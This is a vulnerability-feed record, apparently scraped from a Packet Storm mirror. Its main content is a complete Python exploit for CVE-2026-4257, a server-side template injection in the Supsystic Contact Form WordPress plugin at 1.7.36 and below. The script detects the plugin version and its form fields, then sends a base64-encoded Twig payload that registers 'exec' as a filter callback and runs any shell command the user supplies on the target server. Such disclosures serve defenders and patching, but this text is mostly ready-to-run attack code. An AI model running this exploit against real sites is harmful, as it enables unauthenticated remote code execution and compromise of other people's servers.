{“lastseen”:”2026-05-14T16:32:07″,”description”:”Proof of concept code execution exploit for a server-side template injection vulnerability in WordPress Supsystic Contact Form plugin versions 1.7.36 and below…”,”published”:”2026-05-14T00:00:00″,”modified”:”2026-05-14T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Supsystic Contact Form 1.7.36 Server-Side Template Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:221082″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-4257″],”sourceData”:”# Exploit Title: WordPress Plugin Supsystic Contact Form 1.7.36 – SSTI\\n # Date: 3\/30\/2026\\n # Exploit Author: bootstrapbool\\n # Vendor Homepage: https:\/\/supsystic.com\/plugins\/contact-form-plugin\/\\n # Software Link: https:\/\/wordpress.org\/plugins\/contact-form-by-supsystic\/\\n # Version: \\u003c= 1.7.36\\n # Tested on: Ubuntu 24 and Windows 10\\n # CVE : CVE-2026-4257\\n \\n \\n import argparse\\n import base64\\n import re\\n import requests\\n \\n class status:\\n OKGREEN = \\”\\\\033[32m\\”\\n WARNING = \\”\\\\033[33m\\”\\n FAIL = \\”\\\\033[31m\\”\\n ENDC = \\”\\\\033[0m\\”\\n NOCOLOR = False\\n VERBOSE = False\\n \\n @classmethod\\n def print(cls, message: str, status: str = None):\\n \\n if cls.NOCOLOR:\\n print(message)\\n return\\n \\n match status:\\n case \\”FAIL\\”:\\n print(f\\”{cls.FAIL}{message}{cls.ENDC}\\”)\\n case \\”WARNING\\”:\\n print(f\\”{cls.WARNING}{message}{cls.ENDC}\\”)\\n case \\”SUCCESS\\”:\\n print(f\\”{cls.OKGREEN}{message}{cls.ENDC}\\”)\\n case _:\\n print(message)\\n \\n @classmethod\\n def vprint(cls, message: str, status: str = None):\\n if cls.VERBOSE:\\n cls.print(message, status)\\n \\n def get_page(url: str) -\\u003e str:\\n \\n try:\\n res = requests.get(url)\\n res.raise_for_status()\\n except requests.excpetions.RequestException as e:\\n status.print(f\\”Request to {url} failed with {res.status_code}\\”)\\n exit(1)\\n \\n if res.status_code != 200:\\n status.print(f\\”Got {res.status_code} for request to: {url}\\”, \\”WARNING\\”)\\n \\n return res.text\\n \\n def get_version(body: str) -\\u003e str | None:\\n pattern = r’suptablesui.min.css\\\\?ver=([0-9\\\\.]+)’\\n \\n match = re.search(pattern, body)\\n \\n if match:\\n return match.group(1)\\n \\n def is_vulnerable(version: str) -\\u003e bool:\\n \\n try:\\n major, minor, patch = map(int, version.split(\\”.\\”))\\n return (major, minor, patch) \\u003c= (1, 7, 36)\\n except:\\n status.vprint(f\\”Failed to parse version.\\”, \\”WARNING\\”)\\n \\n def detect_version(body: str):\\n version = get_version(body)\\n \\n vulnerable = is_vulnerable(version)\\n if vulnerable:\\n status.vprint(f\\”Detected version {version} is vulnerable.\\”, \\”SUCCESS\\”)\\n elif vulnerable != None:\\n status.vprint(\\n f\\”Detected version {version} is not vulnerable.\\”,\\n \\”WARNING\\”)\\n \\n def detect_fields(body: str) -\\u003e list[str] | None:\\n \\”\\”\\”Automatically attempt to get Contact Form fields to use for SSTI\\”\\”\\”\\n \\n pattern = r’data-name=\\”([^\\”]+)\\”‘\\n \\n field_names = list(set(re.findall(pattern, body)))\\n \\n if field_names:\\n status.print(f\\”Detected fields: {field_names}\\”, \\”SUCCESS\\”)\\n return field_names\\n \\n def handle_field(body: str, field: str | None) -\\u003e str:\\n \\n if field:\\n return field\\n \\n fields = detect_fields(body)\\n \\n if fields is not None:\\n status.vprint(f\\”Using automatically detected field: {fields[0]}\\”)\\n \\n return fields[0]\\n \\n status.print(\\”Failed to detect fields.\\”, \\”FAIL\\”)\\n exit(1)\\n \\n def get_output(field: str, body: str) -\\u003e str | None:\\n \\n pattern = rf’name=\\”fields\\\\[{re.escape(field)}\\\\]\\”\\\\s+value=\\”([^\\”]+)\\”‘\\n match = re.search(pattern, body)\\n \\n if match:\\n return match.group(1)\\n \\n def exploit(url: str, payload: str, field: str) -\\u003e str | None:\\n \\n utf8_var = \\”{%set a%}UTF-8{%endset%}\\”\\n base64_var = \\”{%set b%}BASE64{%endset%}\\”\\n \\n twig_payload = \\”{%set p%}\\” + base64.urlsafe_b64encode(payload.encode(‘utf-8’)).decode(‘utf-8’) + \\”{%endset%}\\”\\n \\n # The () ensures the variables are not treated as string literals\\n twig_payload_decode = \\”{%set p = p|convert_encoding((a), (b))%}\\”\\n \\n register_callback = \\”{%set e%}exec{%endset%}{{_self.env.registerUndefinedFilterCallback(e|lower)}}\\”\\n \\n exec_filter = \\”{{_self.env.getFilter(p)}}\\”\\n \\n ssti_payload = utf8_var + base64_var + twig_payload + twig_payload_decode + register_callback + exec_filter\\n status.vprint(f\\”Payload: {payload}\\”)\\n \\n params = {\\n \\”cfsPreFill\\”: 1,\\n field: ssti_payload}\\n \\n try:\\n res = requests.get(url, params)\\n res.raise_for_status()\\n except requests.excpetions.RequestException as e:\\n status.print(f\\”Request to {url} failed with {res.status_code}\\”)\\n exit(1)\\n \\n if res.status_code != 200:\\n status.print(f\\”Got {res.status_code} for request to: {url}\\”, \\”WARNING\\”)\\n \\n return get_output(field, res.text)\\n \\n def main():\\n parser = argparse.ArgumentParser()\\n parser.add_argument(\\n \\”–field\\”,\\n type = str,\\n help = (\\”Valid field part of the Contact Form. The defaults are \\”\\n + \\”first_name, last_name, subject, message, and email. Though it’s \\”\\n + \\”possible for none of these fields to appear. Not all field types\\”\\n + \\”work. The tested field types that are confirmed to work are\\”\\n + \\”Text, Textarea, Number, Email, Time, and URL. Buttons do not \\”\\n + \\”work.\\”))\\n parser.add_argument(\\n \\”–no-color\\”,\\n action = \\”store_true\\”,\\n help = \\”If you dont want pretty colors in your output.\\”)\\n parser.add_argument(\\n \\”–verbose\\”,\\n \\”-v\\”,\\n action = \\”store_true\\”)\\n parser.add_argument(\\n \\”url\\”,\\n type = str,\\n help = (\\”Full URL to page with vulnerable Contact Form component. \\” \\\\\\n + \\”Ex: http:\/\/localhost:4444\/sample.php\\”))\\n parser.add_argument(\\n \\”payload\\”,\\n type = str,\\n default = None,\\n help = (\\”Shell commands to be executed.\\”))\\n \\n args = parser.parse_args()\\n \\n status.NOCOLOR = args.no_color\\n status.VERBOSE = args.verbose\\n \\n body = get_page(args.url)\\n \\n detect_version(body)\\n field = handle_field(body, args.field)\\n \\n output = exploit(args.url, args.payload, field)\\n \\n if output:\\n if output.lower() == field.lower():\\n status.print(\\n \\”Output is same as field. Maybe try a different field?\\”,\\n \\”WARNING\\”)\\n status.print(output)\\n else:\\n status.print(\\n f\\”Failed to extract output with field ‘{field}’\\”,\\n \\”FAIL\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/221082″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/221082\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-14T16:32:07″,”description”:”Proof of concept code execution exploit for a server-side template injection vulnerability in WordPress Supsystic Contact Form plugin versions 1.7.36 and below…”,”published”:”2026-05-14T00:00:00″,”modified”:”2026-05-14T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Supsystic Contact…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-54579","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n